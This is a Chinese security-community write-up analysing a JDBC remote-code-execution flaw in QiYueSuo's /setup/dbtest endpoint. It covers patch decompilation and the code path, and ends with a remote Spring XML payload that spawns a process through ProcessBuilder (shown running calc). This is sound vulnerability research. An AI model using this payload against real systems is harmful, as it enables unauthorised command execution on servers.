奇安信攻防社区-契约锁JDBC RCE漏洞分析

契约锁JDBC RCE漏洞分析

契约锁JDBC RCE漏洞分析
===============

分析补丁
----

对补丁进行反编译，看到特殊的filter：

![image-20250612165636636](https://oss-yg-cztt.yun.qianxin.com/butian-public/f7198b66a6e6dbcc6e4aa2d184698f4ee.png)

对`security.rsc`进行解密，找到被过滤的接口

![image-20250612165835813](https://oss-yg-cztt.yun.qianxin.com/butian-public/f7a4ccc38031043625ed04b11af758430.png)

漏洞分析
----

找到`/setup/dbtest`所在的类：

![image-20250612165940765](https://oss-yg-cztt.yun.qianxin.com/butian-public/fe3ba956110cd400652e9e7556c3f6883.png)

其主要是获取DatabaseProperties类型的参数

![image-20250612170056354](https://oss-yg-cztt.yun.qianxin.com/butian-public/fbfaf0b9a88f81770a4677d1263007627.png)

其中包括数据库类型，host，name等

然后进入`setupService.check`方法，

![image-20250612170237378](https://oss-yg-cztt.yun.qianxin.com/butian-public/f2b8a207fd26b49cd26b79a464ac953e8.png)

![image-20250612170259990](https://oss-yg-cztt.yun.qianxin.com/butian-public/f04bb3b3a5717e51586235c91c2306006.png)

最终是调用DatabaseConnection#getConnection，通过反射传入的db实例化对象，调用其getConnection测试jdbc连接

![image-20250612170836791](https://oss-yg-cztt.yun.qianxin.com/butian-public/f794c0f2f4676a7f5677371decc1e3d12.png)

可用的db如下

![image-20250612172259030](https://oss-yg-cztt.yun.qianxin.com/butian-public/feb6c70af02030c000d60b27676d176ea.png)

漏洞复现
----

![image-20250612172701844](https://oss-yg-cztt.yun.qianxin.com/butian-public/f6cd09de9fbf405683858f5f20e7450ab.png)

远程xml为：

```xml
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg><list><value>cmd</value><value>/c</value><value><![CDATA[calc]]></value></list></constructor-arg>
</bean>
</beans>
```

发表于 2025-06-27 10:00:48
阅读 ( 249 )
分类：漏洞分析

契约锁JDBC RCE漏洞分析

0 条评论